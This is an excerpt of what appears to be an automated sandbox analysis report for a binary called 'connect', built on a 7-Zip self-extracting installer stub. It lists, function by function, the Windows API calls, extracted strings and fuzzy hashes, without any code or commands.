                                                            • Associated: 00000010.00000002.2573843030.0000000000436000.00000002.00000001.01000000.00000009.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_connect.jbxd
                                                            Similarity
                                                            • API ID: CommandLine$CountTickVersionwsprintf
                                                            • String ID: " -$7-Zip SFX$7ZipSfx.%03x$AutoInstall$BeginPrompt$BeginPromptTimeout$Delete$ExecuteFile$ExecuteOnLoad$FinishMessage$HelpText$InstallPath$P,l$PreExtract$RunProgram$SelfDelete$SetEnvironment$SfxString%d$SfxVarApiPath$SfxVarCmdLine0$SfxVarModulePlatform$SfxVarSystemLanguage$SfxVarSystemPlatform$Shortcut$Sorry, this program requires Microsoft Windows 2000 or later.$\}B$setup.exe$sfxconfig$sfxelevation$sfxlang$sfxversion$sfxwaitall$x86
                                                            • API String ID: 1723450458-706316593
                                                            • Opcode ID: 6ea2fd087c463c26246448f36aff3ab3ad4a3c27bf8f3659cded3ca7ea88b691
                                                            • Instruction ID: fe591844941010429f44e859f80dec6b089a6e9baa65e336561e13b5bdf55dd3
                                                            • Opcode Fuzzy Hash: 6ea2fd087c463c26246448f36aff3ab3ad4a3c27bf8f3659cded3ca7ea88b691
                                                            • Instruction Fuzzy Hash: CB8206B1E04215AADB24BB75EC52BAE3764EB14318F10443FF502B62E2DBBD5D808B5D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            APIs
                                                            • FindFirstFileW.KERNELBASE(?,?,00426BA8,00403E01,?,00000001), ref: 00403CBC
                                                            • lstrcmpW.KERNEL32(?,00426BB0,?,00403E01), ref: 00403D08
                                                            • lstrcmpW.KERNEL32(?,00426BB4), ref: 00403D1E
                                                            • SetFileAttributesW.KERNELBASE(?,00000000,?,00403E01), ref: 00403D37
                                                            • DeleteFileW.KERNELBASE(?), ref: 00403D44
                                                            • FindNextFileW.KERNELBASE(00000000,00000010), ref: 00403D56
                                                            • FindClose.KERNEL32(00000000), ref: 00403D65
                                                            • SetCurrentDirectoryW.KERNEL32 ref: 00403D71
                                                            • SetFileAttributesW.KERNEL32(00403E01,00000000), ref: 00403D7B
                                                            • RemoveDirectoryW.KERNEL32(00403E01), ref: 00403D88
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.2573744570.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.2573719017.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573780579.0000000000426000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573808575.0000000000430000.00000004.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573843030.0000000000436000.00000002.00000001.01000000.00000009.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_connect.jbxd
                                                            Similarity
                                                            • API ID: File$Find$AttributesDirectorylstrcmp$CloseCurrentDeleteFirstNextRemove
                                                            • String ID:
                                                            • API String ID: 3205300333-0
                                                            • Opcode ID: cc43d731c03cbb4038f616f827be555181c05136033f9e1f812c42bd5cc35ed5
                                                            • Instruction ID: 0b965938d7fd1dc5844f4fe6cafd2926f3eaf912dd344a29116ecc7a19cf7c79
                                                            • Opcode Fuzzy Hash: cc43d731c03cbb4038f616f827be555181c05136033f9e1f812c42bd5cc35ed5
                                                            • Instruction Fuzzy Hash: 1B314F31A00118ABDB21AFA1EC48A9E7F7DAF00746F54417AF515E11A0EB388B45DA58
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            APIs
                                                            • ShowWindow.USER32(00070288,00000005,?,?,00000001), ref: 0040262C
                                                            • BringWindowToTop.USER32(?), ref: 00402635
                                                            • ShellExecuteExW.SHELL32(0000003C), ref: 00402667
                                                            • WaitForSingleObject.KERNEL32(?,000000FF,?,?,00000001), ref: 0040267A
                                                            • CloseHandle.KERNEL32(?,?,?,00000001), ref: 00402683
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.2573744570.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.2573719017.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573780579.0000000000426000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573808575.0000000000430000.00000004.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573843030.0000000000436000.00000002.00000001.01000000.00000009.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_connect.jbxd
                                                            Similarity
                                                            • API ID: Window$BringCloseExecuteHandleObjectShellShowSingleWait
                                                            • String ID: <$runas
                                                            • API String ID: 2226624165-1187129395
                                                            • Opcode ID: edc08d954fae6c459c32326b43981e144c5db21d51f3ba96da4c28121a17c145
                                                            • Instruction ID: f6e7de8925abb06dade5db46c2281abbeba45517fdc6b0f2f8240acae50ee933
                                                            • Opcode Fuzzy Hash: edc08d954fae6c459c32326b43981e144c5db21d51f3ba96da4c28121a17c145
                                                            • Instruction Fuzzy Hash: B9315CB1E00219EFDF149FD5EC45AEEBBB4EF04310F10413AEA05A6290DB795941CB58
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            APIs
                                                            • FindFirstFileW.KERNELBASE(?,?), ref: 004043AC
                                                            • FindClose.KERNEL32(00000000), ref: 004043BC
                                                            • SetLastError.KERNEL32(00000010), ref: 004043CD
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.2573744570.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.2573719017.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573780579.0000000000426000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573808575.0000000000430000.00000004.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573843030.0000000000436000.00000002.00000001.01000000.00000009.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_connect.jbxd
                                                            Similarity
                                                            • API ID: Find$CloseErrorFileFirstLast
                                                            • String ID:
                                                            • API String ID: 4020440971-0
                                                            • Opcode ID: 51e7d17a183acfe0b45fd0fe4c80841a4b910e0bbb6a3a3fe48daa13f71b5f8e
                                                            • Instruction ID: e3b0549d9665dc12e139117a84a4800e541ff601511f6dde0f87e89220829db4
                                                            • Opcode Fuzzy Hash: 51e7d17a183acfe0b45fd0fe4c80841a4b910e0bbb6a3a3fe48daa13f71b5f8e
                                                            • Instruction Fuzzy Hash: 33F0F630700108ABCF21AF30EC4DB5B3BACAB8035EF1046B1F925E11E0E774D946AA58
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            APIs
                                                            • FindFirstFileW.KERNELBASE(0040638E,?), ref: 00403DC0
                                                            • FindClose.KERNEL32(00000000), ref: 00403DCC
                                                            • SetFileAttributesW.KERNEL32(0040638E,00000000), ref: 00403DE0
                                                            • DeleteFileW.KERNEL32(0040638E), ref: 00403DED
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.2573744570.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.2573719017.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573780579.0000000000426000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573808575.0000000000430000.00000004.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573843030.0000000000436000.00000002.00000001.01000000.00000009.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_connect.jbxd
                                                            Similarity
                                                            • API ID: File$Find$AttributesCloseDeleteFirst
                                                            • String ID:
                                                            • API String ID: 3319113142-0
                                                            • Opcode ID: 7a61a38b35f2b05a7b4bde6f25ad9c61d42a494951ae97ad8595f31ef7f661e8
                                                            • Instruction ID: 10cdb507c6f18802a829504191793466465721f7b53cb2a47095233dfdd97b6e
                                                            • Opcode Fuzzy Hash: 7a61a38b35f2b05a7b4bde6f25ad9c61d42a494951ae97ad8595f31ef7f661e8
                                                            • Instruction Fuzzy Hash: 4CF05431600148ABDF219F30ED4D75A3FA9AB4035BF444675F41AE00F0DB78CE86AA88
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.2573744570.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.2573719017.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573780579.0000000000426000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573808575.0000000000430000.00000004.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573843030.0000000000436000.00000002.00000001.01000000.00000009.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_connect.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID: 0-3916222277
                                                            • Opcode ID: 0256bec53725de02d832ee6f6f51abc186299f533e587bcbcf9165cb040afc50
                                                            • Instruction ID: d998a19c913f7f912822581fb92aac2ec25c6f99d8a18e6f21e12a811f9c8fff
                                                            • Opcode Fuzzy Hash: 0256bec53725de02d832ee6f6f51abc186299f533e587bcbcf9165cb040afc50
                                                            • Instruction Fuzzy Hash: DC525E75A00219DFCB14DFA9C8949AEBBB5FF48304B14806EE805AB391DB34ED51CF99
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • GetCurrentProcess.KERNEL32(00000002,?,0041BDB5,00000003,0041BA09,00000002,00000003,00000002,00000000), ref: 0041BDD8
                                                            • TerminateProcess.KERNEL32(00000000,?,0041BDB5,00000003,0041BA09,00000002,00000003,00000002,00000000), ref: 0041BDDF
                                                            • ExitProcess.KERNEL32 ref: 0041BDF1
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.2573744570.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.2573719017.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573780579.0000000000426000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573808575.0000000000430000.00000004.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573843030.0000000000436000.00000002.00000001.01000000.00000009.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_connect.jbxd
                                                            Similarity
                                                            • API ID: Process$CurrentExitTerminate
                                                            • String ID:
                                                            • API String ID: 1703294689-0
                                                            • Opcode ID: 207957e0c329094dae35d0a8ebc47e1ce946d3f4a5be13e039f89d831d0761e4
                                                            • Instruction ID: 227a02c008be70c07f796fd34de9e73ae149e9ffe75d4c930773d3de324b7c04
                                                            • Opcode Fuzzy Hash: 207957e0c329094dae35d0a8ebc47e1ce946d3f4a5be13e039f89d831d0761e4
                                                            • Instruction Fuzzy Hash: 39E08C31200208EFCF212F15ED0DADA3F28EB00395B810429F80586232DB39EDD3CB88
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • GetDiskFreeSpaceExW.KERNELBASE(?,00000000,00000000), ref: 004032D1
                                                            • SendMessageW.USER32(00008001,00000000,?), ref: 0040332A
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.2573744570.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.2573719017.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573780579.0000000000426000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573808575.0000000000430000.00000004.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573843030.0000000000436000.00000002.00000001.01000000.00000009.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_connect.jbxd
                                                            Similarity
                                                            • API ID: DiskFreeMessageSendSpace
                                                            • String ID:
                                                            • API String ID: 696007252-0
                                                            • Opcode ID: 9a16ed911049c2afffbb9f7af777bd1b61c45472753dc605de79b2ff63c77514
                                                            • Instruction ID: 2285e2836e3a2db4b6a004885bee9ccc40bf589f8c8ad71c9305bc2d0ff7f81e
                                                            • Opcode Fuzzy Hash: 9a16ed911049c2afffbb9f7af777bd1b61c45472753dc605de79b2ff63c77514
                                                            • Instruction Fuzzy Hash: A2016D70250204EBEB14DF51ECA6F5A3BADAB01715F10453AF900EA1E1DBB9EE408B6C
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            APIs
                                                              • Part of subcall function 00403336: GetCurrentDirectoryW.KERNEL32(00000000,00000000,00000000,?,00000000,00401FC8,?,?,?,?), ref: 0040334F
                                                              • Part of subcall function 00403336: GetCurrentDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 00403365
                                                            • GetLastError.KERNEL32(?,?,?,?,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00402269
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.2573744570.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.2573719017.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573780579.0000000000426000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573808575.0000000000430000.00000004.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573843030.0000000000436000.00000002.00000001.01000000.00000009.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_connect.jbxd
                                                            Similarity
                                                            • API ID: CurrentDirectory$ErrorLast
                                                            • String ID: ExecuteParameters$del$forcenowait$hidcon$nowait$shc$waitall
                                                            • API String ID: 1128942804-4019298132
                                                            • Opcode ID: 2d5214349d591634bf6aa91414b3519f6bf119ef96bd9c13cb05d7e45e88e4b7
                                                            • Instruction ID: 79abc5d09dd1fe575cbc2c693773810bb592a40cff80e8f1c38a75b2b6ac7b4d
                                                            • Opcode Fuzzy Hash: 2d5214349d591634bf6aa91414b3519f6bf119ef96bd9c13cb05d7e45e88e4b7
                                                            • Instruction Fuzzy Hash: 8281B471900215AADB10BBB1DD56BEF37689F01318F14403FF901B21E2EBBD9A45D66D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            APIs
                                                            • LoadLibraryA.KERNEL32(kernel32), ref: 004063A1
                                                            • #17.COMCTL32 ref: 004063AC
                                                              • Part of subcall function 0040478C: GetUserDefaultUILanguage.KERNEL32(004042F4), ref: 00404798
                                                              • Part of subcall function 004041E0: GetLastError.KERNEL32 ref: 00404227
                                                              • Part of subcall function 004041E0: wsprintfW.USER32 ref: 00404238
                                                              • Part of subcall function 004041E0: GetEnvironmentVariableW.KERNEL32(?,00000000,00000000), ref: 00404247
                                                              • Part of subcall function 004041E0: GetLastError.KERNEL32 ref: 00404252
                                                              • Part of subcall function 004041E0: GetEnvironmentVariableW.KERNEL32(?,00000000,0000002D), ref: 0040427C
                                                              • Part of subcall function 004041E0: GetLastError.KERNEL32 ref: 00404287
                                                              • Part of subcall function 004041E0: lstrcmpiW.KERNEL32(00000000,00000000), ref: 00404299
                                                              • Part of subcall function 004041E0: SetLastError.KERNEL32(00401877), ref: 004042CD
                                                              • Part of subcall function 004041E0: lstrlenA.KERNEL32(00426DB8), ref: 00404303
                                                              • Part of subcall function 004041E0: GetLocaleInfoW.KERNEL32(?,00001004,?,0000001F), ref: 00404352
                                                              • Part of subcall function 004041E0: MultiByteToWideChar.KERNEL32(000004E4,00000000,00426DB8,00000001,00000000,00000002), ref: 00404388
                                                            • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000000,00000000), ref: 0040642D
                                                            • wsprintfW.USER32 ref: 00406441
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.2573744570.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.2573719017.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573780579.0000000000426000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573808575.0000000000430000.00000004.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573843030.0000000000436000.00000002.00000001.01000000.00000009.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_connect.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$EnvironmentVariablewsprintf$ByteCharDefaultFolderInfoLanguageLibraryLoadLocaleMultiPathSpecialUserWidelstrcmpilstrlen
                                                            • String ID: SfxFolder%02d$X]n$kernel32
                                                            • API String ID: 4084782872-2302643976
                                                            • Opcode ID: 2239f6a811073cff4787cda300e99307c01aa96f1ef7eba5900fab77654688db
                                                            • Instruction ID: 0f1f37d1872d4710edaacd892d75d118e21a553dc86ed096006d16a5be08c7a8
                                                            • Opcode Fuzzy Hash: 2239f6a811073cff4787cda300e99307c01aa96f1ef7eba5900fab77654688db
                                                            • Instruction Fuzzy Hash: B521B5F6A00314ABD710AFB2AC4BB4A7A6CEB54704F01163FF505AB191DAB94650CB5C
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00407642
                                                            • GetProcAddress.KERNEL32(00000000,FreeConsole), ref: 0040764E
                                                            • FreeConsole.KERNELBASE ref: 00407654
                                                            • GetTickCount.KERNEL32 ref: 00407656
                                                              • Part of subcall function 004066CF: GetTickCount.KERNEL32 ref: 004066E6
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.2573744570.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.2573719017.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573780579.0000000000426000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573808575.0000000000430000.00000004.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573843030.0000000000436000.00000002.00000001.01000000.00000009.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_connect.jbxd
                                                            Similarity
                                                            • API ID: CountTick$AddressConsoleFreeHandleModuleProc
                                                            • String ID: FreeConsole$kernel32.dll
                                                            • API String ID: 4175398751-2564406000
                                                            • Opcode ID: 710c50f79aba4c523b4f987b7f45da6f2e16107925628630bea301c033f2ea13
                                                            • Instruction ID: 9aab5fbedfb6153a2c1d2f29fcbd1ee656fb7f9a0bacd6b74a88640cf79d6496
                                                            • Opcode Fuzzy Hash: 710c50f79aba4c523b4f987b7f45da6f2e16107925628630bea301c033f2ea13
                                                            • Instruction Fuzzy Hash: C0E04F32658148ABCF21AFF4EC09D5E3B69EB403647440872F50ED00B0C63EDA62AB5D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.2573744570.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.2573719017.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573780579.0000000000426000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573808575.0000000000430000.00000004.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573843030.0000000000436000.00000002.00000001.01000000.00000009.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_connect.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a8b2acb0b9a4ac2e010bea7435fc9a42d9107897cf5c84b06bfe01fa68f5036b
                                                            • Instruction ID: 04da94e71567e9aefed9a9e97c2b5dbe456225fad92d1bae566689f0b3f5e2fe
                                                            • Opcode Fuzzy Hash: a8b2acb0b9a4ac2e010bea7435fc9a42d9107897cf5c84b06bfe01fa68f5036b
                                                            • Instruction Fuzzy Hash: A6A1AFB2900205EFCF14DF64D888AAA7BB9BF48315F11416AF901EB2D1DB78D982CB54
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.2573744570.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.2573719017.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573780579.0000000000426000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573808575.0000000000430000.00000004.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573843030.0000000000436000.00000002.00000001.01000000.00000009.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_connect.jbxd
                                                            Similarity
                                                            • API ID: _free
                                                            • String ID: (3k$(3k
                                                            • API String ID: 269201875-976709899
                                                            • Opcode ID: 8ffefae7a48324e20509260429bcb6285bdb87c0c19b30ac424f9fa377c60f5f
                                                            • Instruction ID: 5808d26be7ee1ab77fe3c94bb71eb52f8c8bbb4deffaa66e8b4fef4713e96f15
                                                            • Opcode Fuzzy Hash: 8ffefae7a48324e20509260429bcb6285bdb87c0c19b30ac424f9fa377c60f5f
                                                            • Instruction Fuzzy Hash: D9E0E5B2E8151187A22177BB7C423EB1182AB81336F11037BF828866D0DF7C88C2415E
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            APIs
                                                            • CreateThread.KERNELBASE(00000000,00000000,Function_00002CD8,?,00000000,?), ref: 0040292B
                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF,?,00000000,?,?), ref: 00402954
                                                            • GetExitCodeThread.KERNELBASE(00000000,?,?,00000000,?,?), ref: 004029B8
                                                            • SetLastError.KERNEL32(00000000,?,00000000,?,?), ref: 004029F1
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.2573744570.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.2573719017.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573780579.0000000000426000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573808575.0000000000430000.00000004.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573843030.0000000000436000.00000002.00000001.01000000.00000009.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_connect.jbxd
                                                            Similarity
                                                            • API ID: Thread$CodeCreateErrorExitLastObjectSingleWait
                                                            • String ID:
                                                            • API String ID: 2732711357-0
                                                            • Opcode ID: cb10d619cf2ab680e23a13bb2d3634a23182bcaf601ffd911dd3e2998509d960
                                                            • Instruction ID: 58ea0535a05782b0a44f655f21f23703f2f01dc76f16a7a514f10e5c7f21ff91
                                                            • Opcode Fuzzy Hash: cb10d619cf2ab680e23a13bb2d3634a23182bcaf601ffd911dd3e2998509d960
                                                            • Instruction Fuzzy Hash: BF31F4B1700215AADB348B159E8EA6B3669E781750F24863BF801F53E0D6F9C841EA6D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            APIs
                                                            • GetTempPathW.KERNEL32(00000001,00000000,00000002), ref: 00403BFE
                                                            • GetTempPathW.KERNEL32(00000001,00000000,00000001), ref: 00403C21
                                                            • wsprintfW.USER32 ref: 00403C52
                                                            • GetFileAttributesW.KERNELBASE(?), ref: 00403C6E
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.2573744570.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.2573719017.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573780579.0000000000426000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573808575.0000000000430000.00000004.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573843030.0000000000436000.00000002.00000001.01000000.00000009.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_connect.jbxd
                                                            Similarity
                                                            • API ID: PathTemp$AttributesFilewsprintf
                                                            • String ID:
                                                            • API String ID: 1746483863-0
                                                            • Opcode ID: a80e3a81698b617920022f084417ce6a82f48dc66e349b337c01d07c3822e5fb
                                                            • Instruction ID: a1b551e8f7a8d9b312714c8086f5118f3e2773d6592d9aa994a5134f733c3406
                                                            • Opcode Fuzzy Hash: a80e3a81698b617920022f084417ce6a82f48dc66e349b337c01d07c3822e5fb
                                                            • Instruction Fuzzy Hash: 3C1106B2200614AFDB249F25D88086EBBADFF88354741403EFA0AE7290DB346D11C7D8
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            APIs
                                                            • CreateDirectoryW.KERNELBASE(00000000,00000000,00000000,?,004037E9,00000000,00000000,?,?,?,?,00402FA6,?,?), ref: 004057EC
                                                            • GetLastError.KERNEL32(?,004037E9,00000000,00000000,?,?,?,?,00402FA6,?,?), ref: 004057F6
                                                            • SetLastError.KERNEL32(000000B7,?,004037E9,00000000,00000000,?,?,?,?,00402FA6,?,?), ref: 00405806
                                                            • GetFileAttributesW.KERNELBASE(00000000,?,004037E9,00000000,00000000,?,?,?,?,00402FA6,?,?), ref: 00405813
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.2573744570.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.2573719017.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573780579.0000000000426000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573808575.0000000000430000.00000004.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573843030.0000000000436000.00000002.00000001.01000000.00000009.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_connect.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$AttributesCreateDirectoryFile
                                                            • String ID:
                                                            • API String ID: 635176117-0
                                                            • Opcode ID: 742d029769fec76a59fdf6fc964514f7013abc09cc89ef3447563f51d68903ac
                                                            • Instruction ID: 286c79d07375e42882360ca47a7462318b257a884f5f5e6ad8c68dcc896231c4
                                                            • Opcode Fuzzy Hash: 742d029769fec76a59fdf6fc964514f7013abc09cc89ef3447563f51d68903ac
                                                            • Instruction Fuzzy Hash: 28E06D32685604EBDA203B64AC0C75B3F59DB057A5F918532FD1AE81E0E33598225AAD
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            APIs
                                                            • GetProcAddress.KERNEL32(GetNativeSystemInfo), ref: 0040441B
                                                            • GetNativeSystemInfo.KERNELBASE(?,?,?,004026E0,?,0040218F,?,00000000), ref: 00404429
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.2573744570.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.2573719017.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573780579.0000000000426000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573808575.0000000000430000.00000004.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573843030.0000000000436000.00000002.00000001.01000000.00000009.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_connect.jbxd
                                                            Similarity
                                                            • API ID: AddressInfoNativeProcSystem
                                                            • String ID: GetNativeSystemInfo
                                                            • API String ID: 2220751540-3949249589
                                                            • Opcode ID: 7ff82cbc69c9e933258b6048bd31102f18018c880fc3d2a3a615059d34584359
                                                            • Instruction ID: eaeacf6bb9b19dc556ea4ae534b47c773fb07c3d53b36bee6202c0f25c543307
                                                            • Opcode Fuzzy Hash: 7ff82cbc69c9e933258b6048bd31102f18018c880fc3d2a3a615059d34584359
                                                            • Instruction Fuzzy Hash: 1DD0A9303002085ACB24EBB1ED02AAA37E89A4CA087840570E802F00D0EABDED81E368
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            APIs
                                                            • lstrlenW.KERNEL32(?,00000000,00000000,?,?,?,?,00402FA6,?,?), ref: 00403776
                                                            • GetSystemTimeAsFileTime.KERNEL32(00402FA6,00000000,?,?,?,?,00402FA6,?,?), ref: 004037F2
